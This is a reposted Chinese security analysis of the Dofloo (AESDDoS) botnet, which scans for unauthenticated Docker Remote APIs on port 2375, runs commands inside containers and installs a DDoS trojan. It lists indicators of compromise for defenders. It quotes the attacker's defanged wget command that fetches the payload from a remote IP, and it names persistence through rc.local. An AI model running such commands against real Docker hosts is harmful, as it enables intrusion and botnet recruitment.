Dofloo(AESDDoS)僵尸网络正批量扫描、攻击Docker容器

admin
admin
admin
104267
文章
87
评论
2020年10月5日18:00:50评论256 views字数 2074阅读6分54秒阅读模式

一、背景

Dofloo(AESDDoS)僵尸网络正批量扫描和攻击Docker容器。部分云主机上部署的Docker容器没有针对远程访问做安全认证,存在Remote API允许未授权使用漏洞且暴露在公网,导致黑客通过漏洞入侵并植入Dofloo僵尸网络木马。

云计算兴起后,服务器硬件扩展非常便利,软件服务部署成为了瓶颈,Docker作为开源的引擎可以轻松地为任何应用创建一个轻量级的、可移植的、自给自足的容器,因而逐渐得到广泛应用。而开发者在部署Docker时未对相关服务进行正确合理的配置导致其容易成为黑客入侵的路径之一,之前已有H2Miner利用Docker漏洞进行入侵挖矿的案例被披露(https://mp.weixin.qq.com/s/iNq8SdTZ9IrttAoQYLJw5A)。此次Dofloo僵尸网络入侵系统后,会搜集系统敏感信息并加密上传,接收C&C服务器指令,执行各类DDoS攻击。

二、详细分析

在此次攻击中,攻击者首先通过向端口2375(与Docker守护进程通信的默认端口)发送TCP SYN数据包对给定的IP范围进行批量扫描。确定开放端口的目标IP后,发送请求调用/containers/json接口获取正在运行中的容器列表,之后使用Docker EXEC命令执行以下shell访问公开主机中所有正在运行的容器并下载木马Linux2.7。

获取容器列表:

Dofloo(AESDDoS)僵尸网络正批量扫描、攻击Docker容器

针对运行状态的容器利用Docker EXEC执行木马下载命令:

wget -P /tmp/ http[:]//49.235.238.111:88/Linux2.7

Dofloo(AESDDoS)僵尸网络正批量扫描、攻击Docker容器

被下载的Dofloo僵尸网络木马Linux2.7会连接到49.235.238.111:48080来发送和接收来自攻击者的远程shell命令。

Dofloo(AESDDoS)僵尸网络正批量扫描、攻击Docker容器

Dofloo(AESDDoS)僵尸网络正批量扫描、攻击Docker容器

Dofloo僵尸网络还会在从被感染系统窃取信息,包括操作系统版本,CPU型号、速度和类型。

Dofloo(AESDDoS)僵尸网络正批量扫描、攻击Docker容器

通过将自身路径写入/etc/rc.local、/etc/rc.d/rc.local、/etc/init.d/boot.local文件中以添加为自启动项。

Dofloo(AESDDoS)僵尸网络正批量扫描、攻击Docker容器

使用AES算法对窃取的系统信息和命令和控制(C&C)数据进行加密。

Dofloo(AESDDoS)僵尸网络正批量扫描、攻击Docker容器

此Dofloo变种能够发起各种类型的DDoS攻击,包括DNS、SYN,LSYN,UDP,UDPS,TCP和CC Flood。

Dofloo(AESDDoS)僵尸网络正批量扫描、攻击Docker容器

IOCs

C2

49.235.238.111:48080

175.24.123.205: 48080

IP

49.235.238.111

89.40.73.126

175.24.123.205

URL

http[:]//49.235.238.111[:]88/Linux2.7

http[:]//49.235.238.111/Lov.sh

http[:]//49.235.238.111/lix

http[:]//49.235.238.111/Verto

http[:]//49.235.238.111[:]88/NgYx

http[:]//49.235.238.111/linux-arm

http[:]//49.235.238.111/shre.sh

http[:]//89.40.73.126[:]8080/Linux2.7

http[:]//89.40.73.126/linux2.6

http[:]//89.40.73.126[:]8080/linux-arm

http[:]//89.40.73.126[:]8080/Linux2.6

http[:]//89.40.73.126[:]8080/YmY

http[:]//89.40.73.126[:]8080/LTF

http[:]//89.40.73.126[:]8080/NgYx

http[:]//89.40.73.126[:]8080/Mar

http[:]//89.40.73.126[:]8080/linux2.6

http[:]//89.40.73.126[:]8080/Flood

http[:]//175.24.123.205:88/Fck

MD5

Flood 0579a022802759f98bfdf08e7dd16768
lix 9530e46caab834e1e66a108e15ea97ca
linux-arm ca1f347447ddf7990ccd0d6744f3545d
Linux 05f28784a0da0c1e406d98c02dc7d560
Rze.sh 48c910cd9a07404fbfb8bf52847e72c3
SHre.sh bb7cdf5707a857036cd41af4bafaed31

参考链接:

https://www.trendmicro.com/en_us/research/19/f/aesddos-botnet-malware-infiltrates-containers-via-exposed-docker-apis.html

https://github.com/SPuerBRead/Docker-Remote-API-Exploit/blob/master/dockerAPI_Exploit.py

Dofloo(AESDDoS)僵尸网络正批量扫描、攻击Docker容器

精彩推荐





Dofloo(AESDDoS)僵尸网络正批量扫描、攻击Docker容器
Dofloo(AESDDoS)僵尸网络正批量扫描、攻击Docker容器Dofloo(AESDDoS)僵尸网络正批量扫描、攻击Docker容器

Dofloo(AESDDoS)僵尸网络正批量扫描、攻击Docker容器Dofloo(AESDDoS)僵尸网络正批量扫描、攻击Docker容器Dofloo(AESDDoS)僵尸网络正批量扫描、攻击Docker容器

Dofloo(AESDDoS)僵尸网络正批量扫描、攻击Docker容器

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2020年10月5日18:00:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Dofloo(AESDDoS)僵尸网络正批量扫描、攻击Docker容器https://cn-sec.com/archives/150082.html

发表评论

匿名网友 填写信息